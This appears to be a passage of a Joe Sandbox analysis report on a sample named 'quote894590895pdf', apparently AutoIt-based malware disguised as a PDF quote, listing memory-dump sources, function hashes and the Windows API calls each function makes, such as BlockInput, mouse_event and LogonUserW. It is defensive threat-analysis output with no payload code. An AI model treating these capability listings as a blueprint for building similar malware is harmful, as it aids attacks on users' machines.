                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27fbd7b9d75ca411de8c85342dc7671ff6541a60d346ff88794b56ff74253dd8
                                                                    • Instruction ID: 63d81520d7e76e52ff75d9f12b81b909dbd5dce0db7d2349cb8cf4a018bb5f14
                                                                    • Opcode Fuzzy Hash: 27fbd7b9d75ca411de8c85342dc7671ff6541a60d346ff88794b56ff74253dd8
                                                                    • Instruction Fuzzy Hash: 77320422D29F414DD723A635D832336A649AFB73D4F15E737E81DB59A6EB39C4838200
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b678741cdeb9e3fac7e158072871a3343b41c432587c4110b9acaf3437b7af3f
                                                                    • Instruction ID: 88a21967f644a7b0fc5172530ca6e013c1b37a4fe1163f9735554076a6890ad5
                                                                    • Opcode Fuzzy Hash: b678741cdeb9e3fac7e158072871a3343b41c432587c4110b9acaf3437b7af3f
                                                                    • Instruction Fuzzy Hash: F6B1F261D2AF404DD723963A8831336B65CAFFB2C5F55D72BFC2A74D22EB2185878141
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 00EC8944
                                                                      • Part of subcall function 00E8537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EC9017,00000000,?,?,?,?,00EC91C8,00000000,?), ref: 00E85383
                                                                      • Part of subcall function 00E8537A: __aulldiv.LIBCMT ref: 00E853A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID:
                                                                    • API String ID: 2893107130-0
                                                                    • Opcode ID: cbf0bfedcb53d63683d99f07f878404589e76ea8eac8546a9b116337f25586e2
                                                                    • Instruction ID: 3dd524e28b00f326a75f36ca9f8ae15460d3616551e56e307cd82bb9ccef2c0b
                                                                    • Opcode Fuzzy Hash: cbf0bfedcb53d63683d99f07f878404589e76ea8eac8546a9b116337f25586e2
                                                                    • Instruction Fuzzy Hash: 3721E432635510CBC729CF25D541B52B3E1EFA5310B289E6CD1E9CB2C0CA35B906DB54
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 00ED403A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: fe1378f321a8a967a6e0909ab694d38a1a4004d5275b52df22acf5deca79a6ca
                                                                    • Instruction ID: 61487307e7cc47967c720329966f46d087c9e39c94a62e7ca5d39b89ec60da19
                                                                    • Opcode Fuzzy Hash: fe1378f321a8a967a6e0909ab694d38a1a4004d5275b52df22acf5deca79a6ca
                                                                    • Instruction Fuzzy Hash: 9DE048712401145FC710AF59E444A96FBDCEF747A0F009016FD49E7351DA70E8458B91
                                                                    APIs
                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00EC4D1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: 5366453c9e6659f843fb6de7fd3b83985eb2d40218d3fc1c6fec46c07717a8ab
                                                                    • Instruction ID: 5607c4167c7163a69c5ebbaea35a26d894fc4094d97e3748ccf652225faac492
                                                                    • Opcode Fuzzy Hash: 5366453c9e6659f843fb6de7fd3b83985eb2d40218d3fc1c6fec46c07717a8ab
                                                                    • Instruction Fuzzy Hash: 45D05EE013020538FC282B209E3FFB60908F3007BAFA4354D7613BA0C5A8EA5C47A035
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EB86B1), ref: 00EB8A93
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 189246b57f61b6787ca07bcf9bb7252c6e11ca81c45aa0ec12b8620436bbcc6d
                                                                    • Instruction ID: 2c752c97d50beb890139ba28dbde3d0012e8505fbd345c4f04cd6ccad915ccce
                                                                    • Opcode Fuzzy Hash: 189246b57f61b6787ca07bcf9bb7252c6e11ca81c45aa0ec12b8620436bbcc6d
                                                                    • Instruction Fuzzy Hash: 6BD05E3226090EAFEF018EA4DC01EAE3B69EB04B01F408111FE15D50A1C775D835AB60
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00EA2171
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID:
                                                                    • API String ID: 2645101109-0
                                                                    • Opcode ID: ca7852f486ec96af56bc9579502ed19ab219e131b23524d217c79e38304680e6
                                                                    • Instruction ID: 6b79a7a1ed9bde8749f23b2c3c6de8479639854f4f3b98353a849f96d2a0d6db
                                                                    • Opcode Fuzzy Hash: ca7852f486ec96af56bc9579502ed19ab219e131b23524d217c79e38304680e6
                                                                    • Instruction Fuzzy Hash: DAC048F180110DDBCB05EBA1DA88EEEB7BCAB08304F2040A6E102F6140D778AB488B71
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E8A2AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 7e849cf060d8c1038bb405733eb743c7b98169ebfe0a793ad1df0d45d6baa794
                                                                    • Instruction ID: f06d16b631b82e154a8ad303335f0aef23dd4ee3e65f5141c44e3ba8bc656ca9
                                                                    • Opcode Fuzzy Hash: 7e849cf060d8c1038bb405733eb743c7b98169ebfe0a793ad1df0d45d6baa794
                                                                    • Instruction Fuzzy Hash: 7DA0113000020CAB8A002B82EC08888BFACEB002A0B008020F80C880228B32A8208A80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73957a35b52286b6f915f9a65db30e4501b171250adbaf7d2c7e44ca402fa709
                                                                    • Instruction ID: 2369b4a7673d2e0efb24c95aa2c6cfd9801681b22a5bb557828a56493129e032
                                                                    • Opcode Fuzzy Hash: 73957a35b52286b6f915f9a65db30e4501b171250adbaf7d2c7e44ca402fa709
                                                                    • Instruction Fuzzy Hash: 30226875644606CBCF388F68C6987FEB7A1FB51308F28E06AD85ABB591DB309D81D740
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction ID: 98cf47646ea485733f6944163c73597746b77b35104ab76fcd9e568a4149218f
                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction Fuzzy Hash: F4C183322050930ADF2D5639843403EBEE55EA27B631A279EE5BFEB0D5EF20C525D720
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction ID: beeb5af439ecbabb61df1021d320689843a259e51f024b187c19fecbce8f41f9
                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction Fuzzy Hash: CDC1823220519309DF2D563A843413EBFE55EA27B631A27ADE5BEEB0D4EF20C525D720
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: eb5c131c57d9e5c2354bc8be54f583a1837cdca668b3a659ded36ffa6d4e7615
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 54C1833220519309DB2D5639843413EFAE55EA27B631A27EDE4BFEB1C4EF20C526D710
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction ID: cf0baf1f9ecdb6c184b14a9f966822953816b6ed06aa5c1fbb30fab72d97f999
                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction Fuzzy Hash: 5541D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction ID: a4e68c08decc7c212398ceec3db8d98ca9dbead67b693e80c121f0dcc8811e3e
                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction Fuzzy Hash: D201D278A00209EFCB44DF98C5809AEF7B9FF88314F208599D909A7302D730AE41DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction ID: 04176ddced3ac49e8d2a0a9b3bdabbbd09b26b2df17aa80cb140ab9d643b22ba
                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction Fuzzy Hash: CA01A878A05109EFCB44DFA8C5909AEF7F9FF48314F208699D91997742D730AE41DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00ED7970
                                                                    • DeleteObject.GDI32(00000000), ref: 00ED7982
                                                                    • DestroyWindow.USER32 ref: 00ED7990
                                                                    • GetDesktopWindow.USER32 ref: 00ED79AA
                                                                    • GetWindowRect.USER32(00000000), ref: 00ED79B1
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00ED7AF2
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00ED7B02
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7B4A
                                                                    • GetClientRect.USER32(00000000,?), ref: 00ED7B56
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00ED7B90
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7BB2
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7BC5
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7BD0
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00ED7BD9
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7BE8
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00ED7BF1
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7BF8
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00ED7C03
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7C15
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00EF2CAC,00000000), ref: 00ED7C2B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00ED7C3B
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00ED7C61
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00ED7C80
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7CA2
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ED7E8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 81986056544bd9ca4b57e00e30302ed439b40cd0dc9979a42ff4fc4bc91ff179
                                                                    • Instruction ID: 8e484961738835a04b0eff286752a041debe0f6dce6a12378dd142a3a375d947
                                                                    • Opcode Fuzzy Hash: 81986056544bd9ca4b57e00e30302ed439b40cd0dc9979a42ff4fc4bc91ff179
                                                                    • Instruction Fuzzy Hash: 6B026B71900219EFDB14DFA5DC89EAEBBB9EF48310F149159F915BB2A1DB30AD01CB60
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,00EEF910), ref: 00EE3690
                                                                    • IsWindowVisible.USER32(?), ref: 00EE36B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 4105515805-45149045
                                                                    • Opcode ID: b908d593c6554625b5931fe0e29e6ae0e61427730ccf50cd06e99259c9eb869d
                                                                    • Instruction ID: d350e1dd70ddb719ad2ee03476ddb975679cddc384a90b88c0d03980b90c4704
                                                                    • Opcode Fuzzy Hash: b908d593c6554625b5931fe0e29e6ae0e61427730ccf50cd06e99259c9eb869d
                                                                    • Instruction Fuzzy Hash: F8D188302042459BCB14FF21C495AAAB7E5AF94344F14656CF89A7B3E3CB71DE4ACB81
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00EEA662
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EEA693
                                                                    • GetSysColor.USER32(0000000F), ref: 00EEA69F
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00EEA6B9
                                                                    • SelectObject.GDI32(?,00000000), ref: 00EEA6C8
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00EEA6F3
                                                                    • GetSysColor.USER32(00000010), ref: 00EEA6FB
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00EEA702
                                                                    • FrameRect.USER32(?,?,00000000), ref: 00EEA711
                                                                    • DeleteObject.GDI32(00000000), ref: 00EEA718
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00EEA763
                                                                    • FillRect.USER32(?,?,00000000), ref: 00EEA795
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EEA7C0
                                                                      • Part of subcall function 00EEA8FC: GetSysColor.USER32(00000012), ref: 00EEA935
                                                                      • Part of subcall function 00EEA8FC: SetTextColor.GDI32(?,?), ref: 00EEA939
                                                                      • Part of subcall function 00EEA8FC: GetSysColorBrush.USER32(0000000F), ref: 00EEA94F
                                                                      • Part of subcall function 00EEA8FC: GetSysColor.USER32(0000000F), ref: 00EEA95A
                                                                      • Part of subcall function 00EEA8FC: GetSysColor.USER32(00000011), ref: 00EEA977
                                                                      • Part of subcall function 00EEA8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EEA985
                                                                      • Part of subcall function 00EEA8FC: SelectObject.GDI32(?,00000000), ref: 00EEA996
                                                                      • Part of subcall function 00EEA8FC: SetBkColor.GDI32(?,00000000), ref: 00EEA99F
